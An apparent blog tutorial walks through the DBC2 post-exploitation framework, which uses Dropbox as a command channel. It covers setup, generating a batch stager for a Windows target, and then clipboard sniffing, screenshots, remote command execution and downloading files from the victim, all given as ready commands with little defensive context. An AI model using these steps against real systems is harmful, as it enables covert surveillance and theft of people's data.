In this article,
we will learn how to use DropboxC2 tool. It is also known as DBC2.
Table of Content:
Introduction
Installation
Getting Dropbox API
Exploiting Target
Sniffing Clipboard
Capturing Screenshot
Command Execution
File Download
Introduction
DBC2 is
primarily a tool for post-exploitation. It has an agent running on the target’s
machine, a controller, running on any machine, PowerShell modules, and Dropbox
servers as a means of communication. It is inspired by the PowerShell Empire
Framework. This tool is developed using python. The credit for developing this
tool goes to Arno0x0x.
For this
particular demonstration,
Attacker: Kali
Linux
Target: Windows
10
Installation
To begin, first
we need the tool on our Attacker Machine. To do this, we will clone the tool
directly from the GitHub.
git clone https://github.com/Arno0x/DBC2
After running
the above command, we would have a directory created by the name of DBC2. Now,
we will traverse inside that directory using the cd command. After that we are
going to need to install the dependencies of the tool. There are multiple ways
to do this, but here we are using pip command along with a requirements.txt
file that we cloned from git earlier.
cd DBC2/
pip install -r requirements.txt
Getting Dropbox API
Now, this tool
uses the Dropbox Servers as the medium to run agents on the target machine. In
order to do that, this tool requires Dropbox API. To get that, first create an
account on Dropbox.
Then after creating the account, head to developer tools here.
A webpage will open similar to the one shown below. Here we will select the
“Dropbox API”. Then in the type of access section we will choose “App folder”.
Name the app as per choice. Then click on Create App Button to proceed.
This will lead
to another webpage as shown below. Here, move on to the O Auth 2 Section,
and
Generate access
token. This will give the Dropbox API required for this particular practical.
Copy the
Generated access token, now get to the directory we cloned earlier. Here we
have a file named config.py. We will open it using nano command and paste the
Access token as the value for “defaultAccessToken” as shown in the given screenshot
given below.
Exploiting Target
Now, it’s time
to run the tool, check for appropriate permission before running the tool. As
we run the tool, we are greeted with a cool looking banner as shown in the
given below. Followed by some details about the Author and Version and tool.
After this it will ask for a master password which will be used to encrypt all
the data between the agents and the controller. Enter the password of choice.
It will encrypt the password entered and display the result. We can copy the
code shown and add to the config.py file so that it doesn’t ask again for a
master password. After this it will create an incoming directory inside the
Directory we cloned earlier. This will used as a buffer to save files from the
target.
python dropboxC2.py
This tool
requires to upload the modules and stager on Dropbox before proceeding further.
We will do this using the command given below.
publishStage dbc2_agent.exe
This will upload
a file on the Dropbox as shown in the image given below. This file is encrypted
using XOR encryption.
Now let’s check
if the stage is published using the command given below:
listPublishedStage
Now that stage
is uploaded, let’s use it to create a stager. We are going to create a batch
file. But we can use many other types of stager options. This tool provides
stager in macro, oneliner, JavaScript, MS build sct and much more. This command
will create a stager.bat in tmp directory. We sent this bat file to our target
machine.
genStager batch default
After the batch
file is executed on the target machine, we will be informed with a message on
the terminal that Agent found with ID. Now we will use the list command to see
the list of the agents. And then we will copy the AgentID and then use it to
interact with the session as shown in the given image.
list
use [AgentID]
This will create
a file on the Dropbox with the .status extension as shown in the given image.
Clipboard Sniffing
We can get the
clipboard data that the target has on its clipboard. That is., the data he/she
has copied. To do this we will have to start a sniffer using the command
clipboardLogger start. Then wait till the target copies some data. Then Stop
the sniffer using the command clipboardLogger stop. After stopping the sniffer
the clipboard will be saved in a text file inside the incoming directory.
clipboardLogger start
clipboardLogger stop
Let’s take a
look at what target copied on his/her machine. We are going to use the cat
command on a new Kali terminal to read the file as shown in the give image.
cat /root/DBC2/incoming/clipboardlogger.txt
Capturing Screenshot
Now further more
we can grab a screenshot of then target machine. To do this we will use the screenshot
command as show in the given image.
screenshot
The screenshot
will be captured and stored in the incoming directory. We can see that the
target is browsing a website on his/her machine in the given image.
Command Execution
We can run some
PowerShell commands on the target machine using the parameter cmd. This tool
doesn’t offer the shell but it can execute one command at a time. So, we type
cmd and then it asks the command that is to be executed. Here we run the
command dir. And we have the list of files as shown in the given image.
cmd
dir
File Download
Furthermore, we
can download files from the target. To do this we will have to use the command
getFile followed by the file name or path. This will download the file form the
target to our attacker machine.
getFile sharetext.txt
The tool will
download the file inside the incoming directory we discussed earlier. We can
view the file using cat command as shown in the image given below.
cat /root/DBC2/incoming/sharetext.txt
0 comments:
Post a Comment